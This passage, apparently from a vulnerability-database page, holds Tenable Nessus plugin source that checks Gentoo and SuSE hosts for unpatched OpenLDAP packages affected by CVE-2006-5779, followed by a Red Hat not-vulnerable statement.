      script_set_attribute(
        attribute:"see_also",
        value:"https://security.gentoo.org/glsa/200611-25"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "All OpenLDAP users should upgrade to the latest version:
        # emerge --sync
        # emerge --ask --oneshot --verbose 'net-nds/openldap'"
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:openldap");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2006/11/28");
      script_set_attribute(attribute:"plugin_publication_date", value:"2006/11/30");
      script_set_attribute(attribute:"vuln_publication_date", value:"2006/11/06");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.");
      script_family(english:"Gentoo Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("qpkg.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
    if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    
    if (qpkg_check(package:"net-nds/openldap", unaffected:make_list("ge 2.3.27-r3", "rge 2.2.28-r5", "rge 2.1.30-r8"), vulnerable:make_list("lt 2.3.27-r3"))) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());
      else security_warning(0);
      exit(0);
    }
    else
    {
      tested = qpkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "OpenLDAP");
    }
    
  • NASL familySuSE Local Security Checks
    NASL idSUSE_OPENLDAP2-CLIENT-2291.NASL
    descriptionOpenLDAP libldap
    last seen2020-06-01
    modified2020-06-02
    plugin id29537
    published2007-12-13
    reporterThis script is Copyright (C) 2007-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/29537
    titleSuSE 10 Security Update : openldap2-client (ZYPP Patch Number 2291)
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The text description of this plugin is (C) Novell, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(29537);
      script_version ("1.12");
      script_cvs_date("Date: 2019/10/25 13:36:28");
    
      script_cve_id("CVE-2006-5779");
    
      script_name(english:"SuSE 10 Security Update : openldap2-client (ZYPP Patch Number 2291)");
      script_summary(english:"Checks rpm output for the updated packages");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote SuSE 10 host is missing a security-related patch."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "OpenLDAP libldap's strval2strlen() function contained a bug when
    processing the authcid string of certain Bind Requests, which could
    allow attackers to cause an affected application (especially the
    OpenLDAP Server) to crash. (CVE-2006-5779)"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"http://support.novell.com/security/cve/CVE-2006-5779.html"
      );
      script_set_attribute(attribute:"solution", value:"Apply ZYPP patch number 2291.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:suse:suse_linux");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2006/11/17");
      script_set_attribute(attribute:"plugin_publication_date", value:"2007/12/13");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.");
      script_family(english:"SuSE Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");
    
      exit(0);
    }
    
    
    include("global_settings.inc");
    include("rpm.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) exit(0, "Local checks are not enabled.");
    if (!get_kb_item("Host/SuSE/release")) exit(0, "The host is not running SuSE.");
    if (!get_kb_item("Host/SuSE/rpm-list")) exit(1, "Could not obtain the list of installed packages.");
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) exit(1, "Failed to determine the architecture type.");
    if (cpu >!< "x86_64" && cpu !~ "^i[3-6]86$") exit(1, "Local checks for SuSE 10 on the '"+cpu+"' architecture have not been implemented.");
    
    
    flag = 0;
    if (rpm_check(release:"SLED10", sp:0, reference:"openldap2-client-2.3.19-18.11")) flag++;
    if (rpm_check(release:"SLED10", sp:0, cpu:"x86_64", reference:"openldap2-client-32bit-2.3.19-18.11")) flag++;
    if (rpm_check(release:"SLES10", sp:0, reference:"openldap2-client-2.3.19-18.11")) flag++;
    if (rpm_check(release:"SLES10", sp:0, cpu:"x86_64", reference:"openldap2-client-32bit-2.3.19-18.11")) flag++;
    
    
    if (flag)
    {
      if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
      else security_warning(0);
      exit(0);
    }
    else exit(0, "The host is not affected.");
    

Statements

contributorJoshua Bressers
lastmodified2007-03-14
organizationRed Hat
statementNot Vulnerable. The OpenLDAP versions shipped with Red Hat Enterprise Linux 4 and earlier do not contain the vulnerable code in question. Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.

References